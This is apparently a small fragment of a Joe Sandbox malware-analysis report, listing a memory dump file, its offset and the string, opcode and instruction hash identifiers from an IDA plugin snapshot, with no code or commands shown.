                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000003.3121469673.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, Offset: 00AF7000, based on PE: false
                                                                                                                                                                                                                                      • Associated: 00000000.00000003.3219361874.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_3_af3000_ardware-v1.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: a$i$s
                                                                                                                                                                                                                                      • API String ID: 0-851615750
                                                                                                                                                                                                                                      • Opcode ID: ec837ba0b66a3bef05005b2bdcf429e647225e17fe92ebac406debfedbf87803
                                                                                                                                                                                                                                      • Instruction ID: cfd347e55269de0062d19d3f9226324595f9bf20be80f9a9bf2f815f5caac7e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec837ba0b66a3bef05005b2bdcf429e647225e17fe92ebac406debfedbf87803
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A32739694E3C44FE31387709C69A963FB05F23248B4F42EBC0C4CB5E3E6589A59D762